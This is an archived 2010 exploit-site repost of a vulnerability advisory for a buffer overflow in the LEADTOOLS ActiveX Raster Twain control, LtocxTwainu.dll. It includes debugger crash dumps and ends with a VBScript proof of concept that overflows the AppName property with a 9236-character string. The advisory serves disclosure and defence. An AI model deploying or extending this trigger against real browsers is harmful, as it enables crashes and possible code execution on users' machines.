Leadtools ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Buffe
Posted on 28 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Leadtools ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Buffer Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================================== Leadtools ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Buffer Overflow ====================================================================== LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC Vendor: LEAD Technologies, Inc. Product Web Page: http://www.leadtools.com Affected Version: 16.5.0.2 Summary: With LEADTOOLS you can control any scanner, digital camera or capture card that has a TWAIN (32 and 64 bit) device driver. High-level acquisition support is included for ease of use while low-level functionality is provided for flexibility and control in even the most demanding scanning applications. Desc: The Raster Twain Object Library suffers from a buffer overflow vulnerability because it fails to check the boundry of the user input. Tested On: Microsoft Windows XP Professional SP3 (EN) Windows Internet Explorer 8.0.6001.18702 RFgen Mobile Development Studio 4.0.0.06 (Enterprise) =============================================================== (2c4.2624): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000 eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 ntdll!wcscpy+0xe: 7c912f4e 668901 mov word ptr [ecx],ax ds:0023:01649000=???? 0:000> g (2c4.2624): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041 eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 ntdll!RtlpNtMakeTemporaryKey+0x6a74: 7c96c540 807b07ff cmp byte ptr [ebx+7],0FFh ds:0023:00410040=?? ================================================================== Registers: -------------------------------------------------- EIP 7C912F4E EAX 00130041 EBX 100255BC -> 10014840 -> Asc: @H@H ECX 01649000 EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EDI 00000000 ESI 0013EF6C -> BAAD0008 EBP 0013EDA8 -> 0013EDDC ESP 0013EDA8 -> 0013EDDC -- EIP 7C96C540 EAX 00410039 EBX 00410039 ECX 00150000 -> 000000C8 EDX 00150608 -> 7C97B5A0 EDI 00410041 ESI 00150000 -> 000000C8 EBP 0013F228 -> 0013F278 ESP 0013F220 -> 00150000 ArgDump: -------------------------------------------------- EBP+8 016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+12 0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+16 00000000 EBP+20 0013EF6C -> BAAD0008 EBP+24 100255BC -> 10014840 -> Asc: @H@H EBP+28 0013EDB8 -> 00000000 -- EBP+8 00150000 -> 000000C8 EBP+12 00410039 EBP+16 7C96DBA4 -> Asc: RtlGetUserInfoHeap EBP+20 00000000 EBP+24 00410041 EBP+28 7C80FF12 -> 9868146A CompanyName LEAD Technologies, Inc. FileDescription LEADTOOLS ActiveX Raster Twain (Win32) FileVersion 16,5,0,2 InternalName LTRTNU LegalCopyright © 1991-2009 LEAD Technologies, Inc. OriginalFileName LTRTNU.DLL ProductName LEADTOOLS® for Win32 ProductVersion 16.5.0.0 Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: False Exception Code: ACCESS_VIOLATION Disasm: 7C912F4E MOV [ECX],AX (ntdll.dll) Disasm: 7C96C540 CMP BYTE PTR [EBX+7],FF (ntdll.dll) Exception Code: BREAKPOINT Disasm: 7C90120E INT3 (ntdll.dll) Seh Chain: -------------------------------------------------- 1 7C839AC0 KERNEL32.dll 2 FC2950 VBSCRIPT.dll 3 7C90E900 ntdll.dll 7C912F4E MOV [ECX],AX <--- CRASH 7C96C540 CMP BYTE PTR [EBX+7],FF <--- CRASH 7C90120F RETN <--- CRASH ================================================================== Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk 24.08.2010 Zero Science Lab Advisory ID: ZSL-2010-4960 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php PoC: <object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:Program FilesRFGen40LtocxTwainu.dll" prototype = "Property Let AppName As String" memberName = "AppName" progid = "LTRASTERTWAINLib_U.LEADRasterTwain_U" argCount = 1 arg1=String(9236, "A") target.AppName = arg1 </script> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
